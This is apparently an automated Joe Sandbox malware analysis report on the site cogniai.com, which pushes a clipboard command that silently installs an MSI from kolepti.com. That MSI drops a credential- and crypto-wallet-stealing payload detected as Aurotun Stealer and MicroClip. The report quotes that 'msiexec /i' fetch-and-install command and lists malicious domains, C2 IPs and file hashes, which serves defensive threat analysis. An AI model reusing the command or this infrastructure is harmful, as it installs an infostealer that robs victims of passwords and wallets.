              Source: Yara matchFile source: 0000001C.00000002.1636324703.0000020D26D62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Hueta.exe PID: 4916, type: MEMORYSTR
              Yara detected MicroClip
              Source: Yara matchFile source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wallets\Electrum
              Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
              Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1937025690.0000020DC8FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum (USDT ERC-20)
              Source: chrome.exe, 00000000.00000002.1949807943.0000016682202000.00000004.00000001.00040000.00000010.sdmpString found in binary or memory: ProtoDB.LoadEntriesSuccess.GCMKeyStore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7lm9kv4h.defaultJump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\aqo0o2a7.default-releaseJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Aurotun Stealer
              Source: Yara matchFile source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.1636324703.0000020D26D62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Hueta.exe PID: 4916, type: MEMORYSTR
              Yara detected MicroClip
              Source: Yara matchFile source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Replication Through Removable Media              		1
              Scheduled Task/Job              		1
              Browser Extensions              		412
              Process Injection              		13
              Masquerading              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services11
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Disable or Modify Tools              		LSASS Memory1
              Security Software Discovery              		Remote Desktop Protocol2
              Data from Local System              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Services File Permissions Weakness              		1
              Services File Permissions Weakness              		21
              Virtualization/Sandbox Evasion              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron11
              DLL Side-Loading              		11
              DLL Side-Loading              		412
              Process Injection              		NTDS21
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Extra Window Memory Injection              		1
              Services File Permissions Weakness              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              DLL Side-Loading              		Cached Domain Credentials11
              Peripheral Device Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Extra Window Memory Injection              		DCSync2
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1701089 URL: HTTPS://cogniai.com Startdate: 28/05/2025 Architecture: WINDOWS Score: 100 69 kolepti.com 2->69 71 pki-goog.l.google.com 2->71 73 6 other IPs or domains 2->73 95 Suricata IDS alerts for network traffic 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 Yara detected Aurotun Stealer 2->99 101 7 other signatures 2->101 10 msiexec.exe 3 9 2->10         started        14 chrome.exe 2 2->14         started        17 cmd.exe 1 2->17         started        19 3 other processes 2->19 signatures3 process4 dnsIp5 83 kolepti.com 172.67.148.228, 443, 49723 CLOUDFLARENETUS United States 10->83 61 C:\Windows\Installer\MSIE1FD.tmp, PE32 10->61 dropped 21 msiexec.exe 5 10->21         started        85 192.168.2.24, 138, 443, 49394 unknown unknown 14->85 113 Found many strings related to Crypto-Wallets (likely being stolen) 14->113 23 chrome.exe 14->23         started        26 conhost.exe 17->26         started        28 msiexec.exe 17->28         started        30 conhost.exe 19->30         started        file6 signatures7 process8 dnsIp9 32 0xBKHFISYHPX.exe 2 21->32         started        37 expand.exe 4 21->37         started        39 icacls.exe 1 21->39         started        75 cogniai.com 74.208.236.215, 443, 49684, 49685 ONEANDONE-ASBrauerstrasse48DE United States 23->75 77 beacons.gvt2.com 142.250.101.94, 443, 49690 GOOGLEUS United States 23->77 79 10 other IPs or domains 23->79 process10 dnsIp11 63 91.200.14.69, 49724, 7712 BELCOMUA-ASUA Ukraine 32->63 65 api.ipify.org 172.67.74.152, 443, 49727 CLOUDFLARENETUS United States 32->65 67 127.0.0.1 unknown unknown 32->67 53 C:\Windows\System32\Hueta.exe, PE32+ 32->53 dropped 55 C:\Users\user\...\gr0D62WdkfOXqpbHbRHp, PE32+ 32->55 dropped 87 Found many strings related to Crypto-Wallets (likely being stolen) 32->87 89 Modifies the context of a thread in another process (thread injection) 32->89 91 Found hidden mapped module (file has been removed from disk) 32->91 93 2 other signatures 32->93 41 cmd.exe 32->41         started        45 powershell.exe 23 32->45         started        57 C:\Users\user\...\0xBKHFISYHPX.exe (copy), PE32+ 37->57 dropped 59 C:\...\3b4007d200875d4c9c58c44073469727.tmp, PE32+ 37->59 dropped 47 conhost.exe 37->47         started        49 conhost.exe 39->49         started        file12 signatures13 process14 dnsIp15 81 d-nodes.shop 172.67.149.12, 443, 49730 CLOUDFLARENETUS United States 41->81 103 Found many strings related to Crypto-Wallets (likely being stolen) 41->103 105 Tries to harvest and steal browser information (history, passwords, etc) 41->105 107 Writes to foreign memory regions 41->107 109 Creates a thread in another existing process (thread injection) 41->109 111 Loading BitLocker PowerShell Module 45->111 51 conhost.exe 45->51         started        signatures16 process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Windows\Installer\MSIE1FD.tmp0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              analytiwave.com
              		104.21.68.46
              		truefalse
                		high
                a.nel.cloudflare.com
                		35.190.80.1
                		truefalse
                  		high
                  ka-f.fontawesome.com.cdn.cloudflare.net
                  		172.67.139.119
                  		truefalse
                    		high
                    d-nodes.shop
                    		172.67.149.12
                    		truefalse
                      		unknown
                      beacons-handoff.gcp.gvt2.com
                      		142.250.101.94
                      		truefalse
                        		high
                        security.flaweguaard.com
                        		172.67.132.245
                        		truefalse
                          		unknown
                          beacons.gvt2.com
                          		142.250.101.94
                          		truefalse
                            		high
                            pki-goog.l.google.com
                            		74.125.137.94
                            		truefalse
                              		high
                              cogniai.com
                              		74.208.236.215
                              		truefalse
                                		unknown
                                kolepti.com
                                		172.67.148.228
                                		truetrue
                                  		unknown
                                  analytiscnode.com
                                  		104.21.80.1
                                  		truefalse
                                    		unknown
                                    www.google.com
                                    		74.125.137.105
                                    		truefalse
                                      		high
                                      api.ipify.org
                                      		172.67.74.152
                                      		truefalse
                                        		high
                                        ka-f.fontawesome.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          beacons.gcp.gvt2.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            c.pki.goog
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://cogniai.com/false
                                                		unknown
                                                http://c.pki.goog/r/r4.crlfalse
                                                  		high
                                                  http://c.pki.goog/r/r1.crlfalse
                                                    		high
                                                    https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1ycmUZFXxLyr2false
                                                      		unknown
                                                      https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5ntrue
                                                        		unknown
                                                        https://cogniai.com/?verified=truefalse
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://analytiscnode.com/chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpfalse
                                                            		unknown
                                                            https://api.ipify.org/0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cogniai.com/wp-content/themes/techze/custom.js?ver=1chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                		unknown
                                                                https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb25chrome.exe, 00000000.00000002.1960138926.0000016688C6A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                  		unknown
                                                                  https://curl.se/docs/http-cookies.html0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                    		high
                                                                    https://analytiscnode.com/A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Lychrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                      		unknown
                                                                      https://curl.se/docs/alt-svc.html0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                        		high
                                                                        https://a.nel.cloudflare.com/report/v4?s=zuflUyn6wpns%2BQxm6uLfjcnmMTjpCzagZEPQ5ZiJ00wYgmh1BDB91s43Nchrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                          		high
                                                                          https://cogniai.com/wp-content/themes/techze/js/yukari-cik.js?ver=1chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                            		unknown
                                                                            https://cogniai.com/?verified=true(chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                              		unknown
                                                                              https://cogniai.com/wp-content/themes/techze/js/pointer.js?ver=1chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                		unknown
                                                                                https://kolepti.com/flare.msichrome.exe, 00000000.00000002.1959321274.0000016688AFC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmptrue
                                                                                  		unknown
                                                                                  https://cogniai.com/?verified=trueFJLUNvbmNlcHQ5LUZGLTAxLTEucG5nchrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                    		unknown
                                                                                    https://curl.se/docs/hsts.html0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                      		high
                                                                                      https://cogniai.com/wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.pngchrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                        		unknown
                                                                                        https://api.ipify.org0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://csp.withgoogle.com/csp/report-to/scaffolding/asuacrsguc:50:0chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                            		high
                                                                                            https://a.nel.cloudflare.com/report/v4?s=71vzwGo%2Fhm%2FpDed9cgryHnFL4kUcpE9%2FU2dfsEHZyIoiO3Nv5l89bchrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                              		high
                                                                                              https://api.ipify.orgmV0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://cogniai.com/12180chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                                    		high
                                                                                                    https://cogniai.com/?verified=truebmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hchrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://api.ipify.orgP0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1cmd.exe, 0000001D.00000003.1732104353.0000022607DC8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1743385571.0000022607DC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://csp.withgoogle.com/csp/apps-themeschrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                                            		high
                                                                                                            https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0cross-origin-opener-policy-report-only:samchrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.google.com/chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpfalse
                                                                                                                		high

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                74.208.236.215
                                                                                                                		cogniai.comUnited States8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                                172.67.139.119
                                                                                                                		ka-f.fontawesome.com.cdn.cloudflare.netUnited States13335CLOUDFLARENETUSfalse
                                                                                                                91.200.14.69
                                                                                                                		unknownUkraine25385BELCOMUA-ASUAtrue
                                                                                                                104.21.80.1
                                                                                                                		analytiscnode.comUnited States13335CLOUDFLARENETUSfalse
                                                                                                                104.21.68.46
                                                                                                                		analytiwave.comUnited States13335CLOUDFLARENETUSfalse
                                                                                                                172.67.132.245
                                                                                                                		security.flaweguaard.comUnited States13335CLOUDFLARENETUSfalse
                                                                                                                172.67.148.228
                                                                                                                		kolepti.comUnited States13335CLOUDFLARENETUStrue
                                                                                                                74.125.137.105
                                                                                                                		www.google.comUnited States15169GOOGLEUSfalse
                                                                                                                172.67.186.167
                                                                                                                		unknownUnited States13335CLOUDFLARENETUSfalse
                                                                                                                142.250.101.94
                                                                                                                		beacons-handoff.gcp.gvt2.comUnited States15169GOOGLEUSfalse
                                                                                                                35.190.80.1
                                                                                                                		a.nel.cloudflare.comUnited States15169GOOGLEUSfalse
                                                                                                                172.67.149.12
                                                                                                                		d-nodes.shopUnited States13335CLOUDFLARENETUSfalse
                                                                                                                172.67.74.152
                                                                                                                		api.ipify.orgUnited States13335CLOUDFLARENETUSfalse

                                                                                                                Private

                                                                                                                IP
                                                                                                                192.168.2.24
                                                                                                                127.0.0.1

                                                                                                                General Information

                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                Analysis ID:1701089
                                                                                                                Start date and time:2025-05-28 23:03:20 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 6m 47s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                Sample URL:HTTPS://cogniai.com
                                                                                                                Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                                                                                Number of analysed new started processes analysed:33
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.spre.phis.troj.spyw.evad.win@48/270@43/15
                                                                                                                EGA Information:Failed
                                                                                                                HCA Information:Failed

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 142.250.141.94, 142.250.101.113, 142.250.101.139, 142.250.101.100, 142.250.101.101, 142.250.101.138, 142.250.101.102, 74.125.137.84, 142.250.141.139, 142.250.141.113, 142.250.141.102, 142.250.141.100, 142.250.141.138, 142.250.141.101, 142.251.2.95, 131.107.255.255, 199.232.214.172, 142.250.101.95, 142.250.141.95, 74.125.137.95, 142.251.2.94, 34.104.35.123, 142.251.2.102, 142.251.2.101, 142.251.2.139, 142.251.2.113, 142.251.2.100, 142.251.2.138, 23.66.134.242
                                                                                                                • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                • Execution Graph export aborted for target 0xBKHFISYHPX.exe, PID 3844 because there are no executed function
                                                                                                                • Execution Graph export aborted for target Hueta.exe, PID 4916 because there are no executed function
                                                                                                                • Execution Graph export aborted for target chrome.exe, PID 5196 because there are no executed function
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                17:04:56API Interceptor1x Sleep call for process: msiexec.exe modified
                                                                                                                17:05:10API Interceptor23x Sleep call for process: powershell.exe modified
                                                                                                                17:05:19API Interceptor3x Sleep call for process: cmd.exe modified
                                                                                                                23:04:52ClipboardRun: msiexec /i https://kolepti.com/flare.msi /qn
                                                                                                                23:05:08Task SchedulerRun new task: TestAutoRun path: C:\Windows\system32\Hueta.exe

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                No context

                                                                                                                Domains

                                                                                                                No context

                                                                                                                ASNs

                                                                                                                No context

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):1296
                                                                                                                Entropy (8bit):5.339394357533721
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:3vZjgcP9wjGo4KCcMRP87KNLgBgoSZM9tdL4tTiK+RRSWPQrK90lhJjCn:hccP9Sn4LRY4grcM9tdL4tTizRvouch8
                                                                                                                MD5:58AE13813CE6F141C94306F75DD88F52
                                                                                                                SHA1:46BEB826F5F873697ADA92766D60E3ADDA30D972
                                                                                                                SHA-256:766AD80EC48002EFC51D5EAC78F16DFD9A41D8620B0E7A9BE04C45EC526A9550
                                                                                                                SHA-512:F2DAB1E72F32C6B2DBD5EB4E6E0E396CB3921EAECC568AE4215D77393460D58A4EBE3AE59447E761E616DC32FE89BCF1D2632764ED7BBBBA8958AF8B54F2231C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:@...e................................................@..........8...................c.O..O.4+m.........System.Numerics.H.....................C...}...>...... .Microsoft.PowerShell.ConsoleHost0...............P!..:..A..............System..4...............s...<.O.h....rv........System.Core.D.................`....A..R............System.Management.AutomationL.................G(*.OK.w..h..*......#.Microsoft.Management.Infrastructure.<.................&cb.1B.u`.)...........System.Configuration4...............F.I..^.M._. ..}........System.Xml..<...................g..C.&..3.e.........System.Management...@...............l...52O.Rt...%.........System.DirectoryServices4...............Y.].s.N.....P........System.Data.H.................R....G.&'Hx-.P........Microsoft.PowerShell.Security...<...............Y.O.;b.D..8IJ...........System.Transactions.P.................u 6Z.L....A.X;......%.Microsoft.PowerShell.Commands.Utility...D...............c\....RG.5..q./........System.Configuration.Ins

                                                                                                                C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files.cab

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 5647497 bytes, 1 file, at 0x2c +A "0xBKHFISYHPX.exe", ID 4151, number 1, 678 datablocks, 0x1203 compression
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5647497
                                                                                                                Entropy (8bit):7.998411386049786
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:98304:BvWejdg5NVPL2qOATqC/8W1eafXsADr1LG6hokpNF3BqgQU2Rcql9BJv6:BvWcwVPBOATqCUdQXsIxa6hok3FgQiBQ
                                                                                                                MD5:9F59F23311A04ECF4483C9C502E29547
                                                                                                                SHA1:03ED9AD2FC346306058B7A0739E52BF94E43F104
                                                                                                                SHA-256:4975F92DF363C701A483B8DBE8FC3F45711429FD7E18C194197522DE5F2A3111
                                                                                                                SHA-512:63DE264866A22A2C7F4E5990850DEC079FB3953955BA57B2160140BCAB9EDC179389E50ABDB4D72E10CC4E73540A1538FF5518A0E8FBF38CFF5EA3CACBBFDB22
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:MSCF.....,V.....,...............7...M.........R........Z<E .0xBKHFISYHPX.exe.A._'$7..[.../. ..."S.$..[.......PeP`. .!.d.;{......w.....E.T%Yn.[,............._.......A...h..T.8^d.#2.x...............~.;{..&.~z..$Ko.{O.br...e.M...^6.+M.9.o...6./.i.[.N.Ld....m.l.+-R6.6.h.k+.&.3..Y...u'~. ...4CVD.`..........n........q......r8n..M.r.7.I.B.6NJ....F.*.@.:...!.@\... 1..%. ..@.r...;i.......m......p...H....z.Te&A.N.D.hZT.6Q.......;n..M.i..7.-......k.[..sm.9...ck..bZ.p*E.h.H.:.....t..{.Q)..?.....B.m..-.,e:3.C....g....j4-.....L.k.o...l+...5...D....-<......y..x8M.?.#*..g..#z...J.l...D..'....G....KA..e.|M/.?.;..T.-..6@lLi..u.kJ.l,.+$P.s.k.&....s.A...gn."_.f.kO...b.....w...sI6:.............'....Fg2..o.t...i.kuo.O.9...].dq.K.....e.-.o:..$..=.].5z.....Z.......jrs.....u).Q.......yb....&E.".N.5.q.....P.....T..FL.2.t.t.SS..r.,...g\......r....2.... %.y..//.tX.S).pa...9...:4^X..:n.......\.:W3.{.0#...2..:Q...S.s....|.E....P..T.rq...]zqmU.)...O].eQ...H.....Nu.}k.....FI.E.W.

                                                                                                                C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe (copy)

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):22192128
                                                                                                                Entropy (8bit):3.068702423787556
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:mdyAZrci4ejZiZylqpt3jtiDeqBKpmlbJdoGliPrptXWYxRwkURVtldGPn:eZZDZiIqpt3jIj0pmhfxliPrTXv3cG
                                                                                                                MD5:CD05164818C9D8380B58C845DD2BB20E
                                                                                                                SHA1:E06735BF609310EB0C9D6FC1537F833C32CD5839
                                                                                                                SHA-256:47F4876626CE8CEF86BC0E4FB8228923C86E78693974EFC89706EF38340CA320
                                                                                                                SHA-512:B6F0072CC6C2E5E81CE4CCE65DCB2F426F5767E89A3B793E5B628694F0E034B09DF78F39B6C09813038715C3B9DB74F1E5FCF142C6A81E5D83F1AC832E55456A
                                                                                                                Malicious:true
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.*zp.D)p.D)p.D)..A(..D)..G(x.D)n..)r.D)...)q.D)..G(z.D)..@(a.D)..A(..D)..B(q.D)..E(}.D)p.E)..D)..@(d.D)..@(1.D)..A(a.D)...)q.D)..F(q.D)Richp.D)........PE..d...P.2h.........."....,......G................@..............................R...........`.................................................D.Q.......R......PR..m............R..... .P.......................P.(.....P.@...............0............................text.............................. ..`.rdata...:F......<F.................@..@.data...lJ....R.......Q.............@....pdata...m...PR..n....R.............@..@.fptable......R.......R.............@....rsrc.........R.......R.............@..@.reloc........R.......R.............@..B................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\6ff0d56ce15b47fcb2f8c73e3a3af1d7$dpx$.tmp\3b4007d200875d4c9c58c44073469727.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):22192128
                                                                                                                Entropy (8bit):3.068702423787556
                                                                                                                Encrypted:false
